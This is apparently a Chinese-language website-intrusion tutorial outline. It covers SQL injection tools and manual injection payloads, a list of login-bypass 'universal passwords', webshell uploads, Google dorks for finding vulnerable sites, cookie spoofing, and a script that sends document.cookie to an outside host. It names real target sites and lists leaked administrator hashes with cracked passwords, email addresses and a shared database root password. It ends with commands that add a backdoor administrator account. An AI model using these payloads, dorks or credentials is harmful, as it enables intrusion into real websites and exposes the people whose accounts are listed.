1.網站入侵概述及準備工作
windows.open('http://域名/info.asp=?msg='+document.cookie)
一、網站入侵的定義
windows.open('http://域名/info.asp=?msg='+document.cookie)
二、網站入侵之后
安全漏洞提交、掛黑頁、掛馬、獲得網站關鍵數據。
三、網站入侵
網站入侵是一門綜合學問,融合了80端口入侵、腳本滲透、服務器滲透、社會工程學、加密解密等等技術。
四、什么是網站服務器
五、常見的網站服務器類型
Windows,Linux,Unix。
六、網站入侵前要做的準備
七、網站常見的程序
asp php .net jsp
2.明小子SQL注入檢測入侵
一、熟悉注入工具
二、進行注入點檢測
三、進行注入
四、猜解數據庫表名
五、猜解數據庫列名
六、檢測結果
七、MD5解密
八、掃描后臺
九、登錄OK
注:程序存在殺毒軟件誤報情況,請關閉殺毒軟件。
3.啊DSQL注入檢測入侵
一、熟悉注入工具
二、進行注入點檢測
三、進行注入
四、猜解數據庫表名
五、猜解數據庫列名
六、檢測結果
七、MD5解密
八、掃描后臺
九、登錄OK
十、啊d和明小子的區別
注:程序存在殺毒軟件誤報情況,無須擔心。
4.ASP大馬數據庫備份上傳
一、asp大馬介紹
二、上傳大馬
三、獲得大馬所在地址
四、備份數據庫更改大馬后綴
五、大馬訪問OK
5.google hacking技術
一、介紹google hacking概念
Google Hacking的含義原指利用Google搜索引擎搜索信息來進行入侵的技術和行為
現指利用各種搜索引擎搜索信息來進行入侵的技術和行為
二、google hacking常見指令
intitle:搜索網頁標題中包含有特定字符的網頁。例如輸入“intitle: cbi”,這樣網頁標題中帶有cbi的網頁都會被搜索出來
inurl:搜索包含有特定字符的URL。例如輸入“inurl:cbi”,則可以找到帶有cbi字符的URL
intext:搜索網頁正文內容中的指定字符,例如輸入“intext:pdf”。這個語法類似我們平時在某些網站中使用的“文章內容搜索”功能
Site:找到與指定網站有聯系的URL。例如輸入“Site:www.58.com”。所有和這個網站有聯系的URL都會被顯示
7.一句話ASP木馬上傳拿Webshell
必備條件:1.拿到數據庫地址 2.數據庫文件為asp結尾
一、尋找可寫入數據庫的方式
二、插入一句話木馬到數據庫
三、用一句話木馬上傳客戶端上傳大馬
四、訪問OK
8.SQL手工注入原理
一、什么是SQL注入
SQL注入攻擊指的是通過構建特殊的輸入作為參數傳入Web應用程序,而這些輸入大都是SQL語法里的一些組合,通過執行SQL語句進而執行攻擊者所要的操作,其主要原因是程序沒有細致地過濾用戶輸入的數據,致使非法數據侵入系統。
二、判定是否存在注入點
and 1=1 ?and 1=2
三、猜解數據庫表名
and 0<>(select count(*) from 表名)
四、猜解數據庫列名
and (select count(列名) from 猜到的表名)>0
五、猜解字段長度
and (select top 1 len(猜到的列名) from 猜到的表名)>0
六、猜解字符內容
and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')
9.萬能密碼及默認密碼登錄后臺
一、萬能密碼原理
萬能密碼漏洞都是因為提交字符未加過濾或過濾不嚴而導致的。
例如后臺系統驗證密碼要求用戶輸入的密碼和數據庫里面的匹配,而用萬能密碼的方式,就是將驗證的語句改成了驗證成功的,邏輯運算符AND和OR的運算優先次序是:先運算AND運算符在運算OR運算符,這個漏洞是發生在登陸口,只有登陸口才會出現這樣的漏洞。
二、萬能密碼大全
ASP 萬能密碼
1:"or "a"="a
2:')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:1 or '1'='1'=1
12:1 or '1'='1' or 1=1
13:'OR 1=1%00
14:"or 1=1%00
15:'xor
16:用戶名 ' UNION Select 1,1,1 FROM admin Where ''=' (替換表名admin) 密碼 1
17: admin' or 'a'='a 密碼隨便
PHP 萬能密碼
1:'or 1=1/*
2:User: something
Pass: ' or '1'='1
JSP 萬能密碼:
1:1'or'1'='1:
2:admin' or 1=1/*
默認密碼:
1:admin
2:admin888
3:123456
4:123123
5:(域名)
10.szwyadmin程序cookies欺騙漏洞
一、搜索關鍵字
inurl:szwyadmin/login.asp
二、進入執行代碼
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
三、更改文件名
login.asp改為admin_index.asp
四、訪問OK
11.跨站攻擊網站演練
一、跨站攻擊的概念
跨站攻擊:即Cross Site Script Execution(通常簡寫為XSS),攻擊者輸入可以顯示在頁面上對其他用戶造成影響的HTML代碼,從而盜取用戶資料、利用用戶身份進行某種動作或者對訪問者進行病毒侵害的一種攻擊方式。
二、跨站攻擊的演示
------------------------------------------------------------------------------------
alert("這個是跨站
alert("這個是跨站攻擊")
12.eWebEditor編輯器入侵網站提權
一、介紹eWebEditor
eWebEditor是一個基于瀏覽器的在線HTML編輯器,WEB開發人員可以用她把傳統的多行文本輸入框替換為可視化的富文本輸入框
二、獲得eWebEditor后臺登錄地址
ewebeditor/Admin_Login.asp
三、登錄
四、拷貝樣式
五、修改樣式設置
六、上傳小馬
七、訪問OK
13.cookies欺騙登錄管理員賬號
一、介紹Cookies
Cookies就是服務器暫時存放在你的電腦里的資料(.txt格式的文本文件),好讓服務器用來辨認你的計算機。當你在瀏覽網站的時候,Web服務器會先送一小小資料放在你的計算機上,Cookies 會把你在網站上所打的文字或是一些選擇都記錄下來。當下次你再訪問同一個網站,Web服務器會先看看有沒有它上次留下的Cookies資料,有的話,就會依據Cookie里的內容來判斷使用者,送出特定的網頁內容給你。
二、Cookies所在位置
HKEY_CRURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVESION\EXPLORER\USER SHELL FOLDERS
Cookies ?這里是Cookies的實際存儲位置
一般來說保存位置是:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
三、注冊登錄
四、找到管理員賬號
五、修改Cookies信息
六、訪問OK
14.入侵檢測OHO系統教育網站
目標站點:連云港海濱中學
一、原理講解
二、操作實例
默認用戶
35b469e289663f9c5ef4bac870e4724f(解密后:321dsaabc)hrbole@163.com
cf94920c73fd59eb2ffbf7048794fe54(解密后:`1221`)lixz1@yahoo.cn
e10adc3949ba59abbe56e057f20f883e(解密后:123456)xiaoshu44877@yahoo.cn
246cc3dcb397f4a73da6fd53703211c9(解密后:gy15996372475)geying10@126.com
f813751a16d7862ac4b0f5ae28168124(解密后:84884291)84884291@qq.com
這些都是統一的管理員賬號密碼,大部分歐虎的站后臺都能登陸。
還有很多賬號,就不列舉了。
后臺地址url/aaa.php或url/home.php或/admin.php聯系我我可以提供更多的賬號以供測試
google搜索(inurl:php intext:技術支持:江蘇連邦信息技術有限公司)或:intitle:全圖形化應用系統開發環境 V2010
即可找到大量使用此系統的站點。
統一的數據庫賬號:root或root1 密碼:ohoad56175617
15.webshell提權服務器登錄
目標站點:www.weixianmanbu.com
一、進入webshell
二、查看執行權限
三、查看端口及用戶
查看端口:netstat -an
查看用戶:net user
四、執行創建用戶及提權
創建用戶:net user weixian 123123 /add
加入管理組:net localgroup administrators weixian /add
激活用戶:net user weixian /active:yes
查看服務器ip地址:ping www.weixianmanbu.com
五、登錄OK